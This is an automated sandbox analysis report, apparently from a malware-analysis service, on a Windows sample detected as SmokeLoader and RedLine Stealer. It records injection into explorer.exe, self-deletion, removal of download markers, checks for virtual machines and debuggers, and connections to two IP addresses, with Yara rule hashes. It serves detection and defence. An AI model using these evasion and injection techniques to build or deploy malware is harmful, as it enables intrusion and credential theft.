      Source: explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe

      Key, Mouse, Clipboard, Microphone and Screen Capturing

      barindex
      Yara detected SmokeLoader
      Source: Yara matchFile source: 00000000.00000002.1862980152.0000000000630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.1863029600.0000000000651000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.2090513435.0000000000560000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.2090678627.0000000001FF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

      System Summary

      barindex
      Malicious sample detected (through community Yara rule)
      Source: 00000005.00000002.2090478524.0000000000550000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: 00000000.00000002.1862957209.0000000000620000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: 00000000.00000002.1862980152.0000000000630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000000.00000002.1863029600.0000000000651000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000005.00000002.2090513435.0000000000560000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000005.00000002.2090678627.0000000001FF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000005.00000002.2090450815.0000000000520000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: 00000000.00000002.1862925311.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 49%
      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exeCode function: 0_2_00403054 RtlCreateUserThread,NtTerminateProcess,0_2_00403054
      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exeCode function: 0_2_00401583 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401583
      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exeCode function: 0_2_00402721 NtEnumerateKey,NtClose,0_2_00402721
      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exeCode function: 0_2_0040158E NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_0040158E
      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exeCode function: 0_2_004015BC NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004015BC
      Source: C:\Users\user\AppData\Roaming\dvjdfvrCode function: 5_2_00403054 RtlCreateUserThread,NtTerminateProcess,5_2_00403054
      Source: C:\Users\user\AppData\Roaming\dvjdfvrCode function: 5_2_00401583 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401583
      Source: C:\Users\user\AppData\Roaming\dvjdfvrCode function: 5_2_00402721 NtEnumerateKey,NtClose,5_2_00402721
      Source: C:\Users\user\AppData\Roaming\dvjdfvrCode function: 5_2_0040158E NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_0040158E
      Source: C:\Users\user\AppData\Roaming\dvjdfvrCode function: 5_2_004015BC NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_004015BC
      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exeCode function: 0_2_00401A280_2_00401A28
      Source: C:\Users\user\AppData\Roaming\dvjdfvrCode function: 5_2_00401A285_2_00401A28
      Source: C:\Users\user\AppData\Roaming\dvjdfvrCode function: 7_2_0040FC4F7_2_0040FC4F
      Source: C:\Users\user\AppData\Roaming\dvjdfvrCode function: 7_2_0040E0387_2_0040E038
      Source: C:\Users\user\AppData\Roaming\dvjdfvrCode function: 7_2_0040D5B07_2_0040D5B0
      Source: C:\Users\user\AppData\Roaming\dvjdfvrCode function: 7_2_00404E2D7_2_00404E2D
      Source: C:\Users\user\AppData\Roaming\dvjdfvrCode function: 7_2_00403ECD7_2_00403ECD
      Source: C:\Users\user\AppData\Roaming\dvjdfvrCode function: 7_2_0040DAF47_2_0040DAF4
      Source: C:\Users\user\AppData\Roaming\dvjdfvrCode function: 7_2_0040E7307_2_0040E730
      Source: kGSZ4dCqYh.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: 00000005.00000002.2090478524.0000000000550000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
      Source: 00000000.00000002.1862957209.0000000000620000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
      Source: 00000000.00000002.1862980152.0000000000630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000000.00000002.1863029600.0000000000651000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000005.00000002.2090513435.0000000000560000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000005.00000002.2090678627.0000000001FF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000005.00000002.2090450815.0000000000520000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: 00000000.00000002.1862925311.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: kGSZ4dCqYh.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: dvjdfvr.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: classification engineClassification label: mal100.troj.evad.winEXE@3/2@83/2
      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exeCode function: 0_2_006019D7 CreateToolhelp32Snapshot,Module32First,0_2_006019D7
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\dvjdfvrJump to behavior
      Source: C:\Users\user\AppData\Roaming\dvjdfvrCommand line argument: K*w7_2_00402DF0
      Source: C:\Users\user\AppData\Roaming\dvjdfvrCommand line argument: l_H)7_2_00402DF0
      Source: kGSZ4dCqYh.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: kGSZ4dCqYh.exeReversingLabs: Detection: 39%
      Source: unknownProcess created: C:\Users\user\Desktop\kGSZ4dCqYh.exe "C:\Users\user\Desktop\kGSZ4dCqYh.exe"
      Source: unknownProcess created: C:\Users\user\AppData\Roaming\dvjdfvr C:\Users\user\AppData\Roaming\dvjdfvr
      Source: unknownProcess created: C:\Users\user\AppData\Roaming\dvjdfvr C:\Users\user\AppData\Roaming\dvjdfvr
      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exeSection loaded: msimg32.dllJump to behavior
      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exeSection loaded: msvcr100.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: windows.internal.shell.broker.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: msvcp140.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\dvjdfvrSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\dvjdfvrSection loaded: msimg32.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\dvjdfvrSection loaded: msvcr100.dllJump to behavior
      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

      Data Obfuscation

      barindex
      Detected unpacking (changes PE section rights)
      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exeUnpacked PE file: 0.2.kGSZ4dCqYh.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
      Source: C:\Users\user\AppData\Roaming\dvjdfvrUnpacked PE file: 5.2.dvjdfvr.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
      Source: C:\Users\user\AppData\Roaming\dvjdfvrCode function: 7_2_00409B95 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,7_2_00409B95
      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exeCode function: 0_2_0040294B push ebx; ret 0_2_00402957
      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exeCode function: 0_2_00402923 push ebx; ret 0_2_00402926
      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exeCode function: 0_2_00402930 push ebx; ret 0_2_00402942
      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exeCode function: 0_2_00608F5D push edi; iretd 0_2_00608F78
      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exeCode function: 0_2_00609231 push edx; iretd 0_2_00609332
      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exeCode function: 0_2_00609305 push edx; iretd 0_2_00609332
      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exeCode function: 0_2_00603113 push es; ret 0_2_00603114
      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exeCode function: 0_2_006229B2 push ebx; ret 0_2_006229BE
      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exeCode function: 0_2_0062298A push ebx; ret 0_2_0062298D
      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exeCode function: 0_2_00622997 push ebx; ret 0_2_006229A9
      Source: C:\Users\user\AppData\Roaming\dvjdfvrCode function: 5_2_0040294B push ebx; ret 5_2_00402957
      Source: C:\Users\user\AppData\Roaming\dvjdfvrCode function: 5_2_00402923 push ebx; ret 5_2_00402926
      Source: C:\Users\user\AppData\Roaming\dvjdfvrCode function: 5_2_00402930 push ebx; ret 5_2_00402942
      Source: C:\Users\user\AppData\Roaming\dvjdfvrCode function: 5_2_00538F5D push edi; iretd 5_2_00538F78
      Source: C:\Users\user\AppData\Roaming\dvjdfvrCode function: 5_2_00533113 push es; ret 5_2_00533114
      Source: C:\Users\user\AppData\Roaming\dvjdfvrCode function: 5_2_00539305 push edx; iretd 5_2_00539332
      Source: C:\Users\user\AppData\Roaming\dvjdfvrCode function: 5_2_00539231 push edx; iretd 5_2_00539332
      Source: C:\Users\user\AppData\Roaming\dvjdfvrCode function: 5_2_00552997 push ebx; ret 5_2_005529A9
      Source: C:\Users\user\AppData\Roaming\dvjdfvrCode function: 5_2_0055298A push ebx; ret 5_2_0055298D
      Source: C:\Users\user\AppData\Roaming\dvjdfvrCode function: 5_2_005529B2 push ebx; ret 5_2_005529BE
      Source: C:\Users\user\AppData\Roaming\dvjdfvrCode function: 7_2_00405439 push ecx; ret 7_2_0040544C
      Source: kGSZ4dCqYh.exeStatic PE information: section name: .text entropy: 7.014294223606666
      Source: dvjdfvr.1.drStatic PE information: section name: .text entropy: 7.014294223606666
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\dvjdfvrJump to dropped file
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\dvjdfvrJump to dropped file

      Hooking and other Techniques for Hiding and Protection

      barindex
      Deletes itself after installation
      Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\kgsz4dcqyh.exeJump to behavior
      Hides that the sample has been downloaded from the Internet (zone.identifier)
      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\dvjdfvr:Zone.Identifier read attributes | deleteJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Checks if the current machine is a virtual machine (disk enumeration)
      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\dvjdfvrKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\dvjdfvrKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\dvjdfvrKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\dvjdfvrKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\dvjdfvrKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\dvjdfvrKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Switches to a custom stack to bypass stack traces
      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exeAPI/Special instruction interceptor: Address: 7FFE2220E814
      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exeAPI/Special instruction interceptor: Address: 7FFE2220D584
      Source: C:\Users\user\AppData\Roaming\dvjdfvrAPI/Special instruction interceptor: Address: 7FFE2220E814
      Source: C:\Users\user\AppData\Roaming\dvjdfvrAPI/Special instruction interceptor: Address: 7FFE2220D584
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
      Source: kGSZ4dCqYh.exe, 00000000.00000002.1863053044.000000000068E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK.
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 461Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 2986Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 807Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 356Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 370Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1738Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 885Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 860Jump to behavior
      Source: C:\Users\user\AppData\Roaming\dvjdfvrEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_7-6562
      Source: C:\Users\user\AppData\Roaming\dvjdfvrAPI coverage: 0.4 %
      Source: C:\Windows\explorer.exe TID: 4828Thread sleep count: 461 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 3156Thread sleep count: 2986 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 3156Thread sleep time: -298600s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 4820Thread sleep count: 807 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 4820Thread sleep time: -80700s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 4924Thread sleep count: 337 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 5228Thread sleep count: 356 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 5228Thread sleep time: -35600s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 4040Thread sleep count: 370 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 4040Thread sleep time: -37000s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 3156Thread sleep count: 1738 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 3156Thread sleep time: -173800s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Roaming\dvjdfvrCode function: 7_2_00402780 InterlockedIncrement,SetFileAttributesA,GetCommConfig,GetNumberFormatW,GetLogicalDriveStringsW,VerifyVersionInfoW,GetComputerNameW,ClearCommBreak,InterlockedIncrement,EnumTimeFormatsW,GetTempFileNameW,_memset,CommConfigDialogW,ReadConsoleInputA,GetVersionExW,InterlockedIncrement,SetVolumeMountPointW,GlobalMemoryStatus,7_2_00402780
      Source: explorer.exe, 00000001.00000000.1845787416.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
      Source: explorer.exe, 00000001.00000000.1845367065.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
      Source: explorer.exe, 00000001.00000000.1845367065.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\w
      Source: explorer.exe, 00000001.00000000.1845787416.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
      Source: explorer.exe, 00000001.00000000.1842655910.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
      Source: explorer.exe, 00000001.00000000.1845787416.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
      Source: explorer.exe, 00000001.00000000.1843808640.00000000078AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTTAVMWare
      Source: explorer.exe, 00000001.00000000.1845367065.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
      Source: explorer.exe, 00000001.00000000.1845367065.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1845367065.000000000982D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: explorer.exe, 00000001.00000000.1845787416.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
      Source: explorer.exe, 00000001.00000000.1843808640.0000000007A34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnx
      Source: explorer.exe, 00000001.00000000.1845367065.0000000009660000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
      Source: explorer.exe, 00000001.00000000.1842655910.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
      Source: explorer.exe, 00000001.00000000.1842655910.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: C:\Users\user\AppData\Roaming\dvjdfvrAPI call chain: ExitProcess graph end nodegraph_7-6564
      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exeSystem information queried: ModuleInformationJump to behavior
      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exeProcess information queried: ProcessInformationJump to behavior

      Anti Debugging

      barindex
      Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exeSystem information queried: CodeIntegrityInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\dvjdfvrSystem information queried: CodeIntegrityInformationJump to behavior
      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\AppData\Roaming\dvjdfvrProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\AppData\Roaming\dvjdfvrCode function: 7_2_0040841C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_0040841C
      Source: C:\Users\user\AppData\Roaming\dvjdfvrCode function: 7_2_00409B95 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,7_2_00409B95
      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exeCode function: 0_2_006012B4 push dword ptr fs:[00000030h]0_2_006012B4
      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exeCode function: 0_2_0062092B mov eax, dword ptr fs:[00000030h]0_2_0062092B
      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exeCode function: 0_2_00620D90 mov eax, dword ptr fs:[00000030h]0_2_00620D90
      Source: C:\Users\user\AppData\Roaming\dvjdfvrCode function: 5_2_005312B4 push dword ptr fs:[00000030h]5_2_005312B4
      Source: C:\Users\user\AppData\Roaming\dvjdfvrCode function: 5_2_0055092B mov eax, dword ptr fs:[00000030h]5_2_0055092B
      Source: C:\Users\user\AppData\Roaming\dvjdfvrCode function: 5_2_00550D90 mov eax, dword ptr fs:[00000030h]5_2_00550D90
      Source: C:\Users\user\AppData\Roaming\dvjdfvrCode function: 7_2_0040841C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_0040841C
      Source: C:\Users\user\AppData\Roaming\dvjdfvrCode function: 7_2_00406DBA _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_00406DBA
      Source: C:\Users\user\AppData\Roaming\dvjdfvrCode function: 7_2_0040BE4E __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_0040BE4E
      Source: C:\Users\user\AppData\Roaming\dvjdfvrCode function: 7_2_00407345 SetUnhandledExceptionFilter,7_2_00407345

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Benign windows process drops PE files
      Source: C:\Windows\explorer.exeFile created: dvjdfvr.1.drJump to dropped file
      System process connects to network (likely due to code injection or exploit)
      Source: C:\Windows\explorer.exeNetwork Connect: 201.124.145.196 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 189.164.127.217 80Jump to behavior
      Creates a thread in another existing process (thread injection)
      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exeThread created: C:\Windows\explorer.exe EIP: 8EF19D0Jump to behavior
      Source: C:\Users\user\AppData\Roaming\dvjdfvrThread created: unknown EIP: 87C19D0Jump to behavior
      Maps a DLL or memory area into another process
      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
      Source: C:\Users\user\AppData\Roaming\dvjdfvrSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\dvjdfvrSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
      Source: explorer.exe, 00000001.00000000.1845367065.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1843673761.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1842872413.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
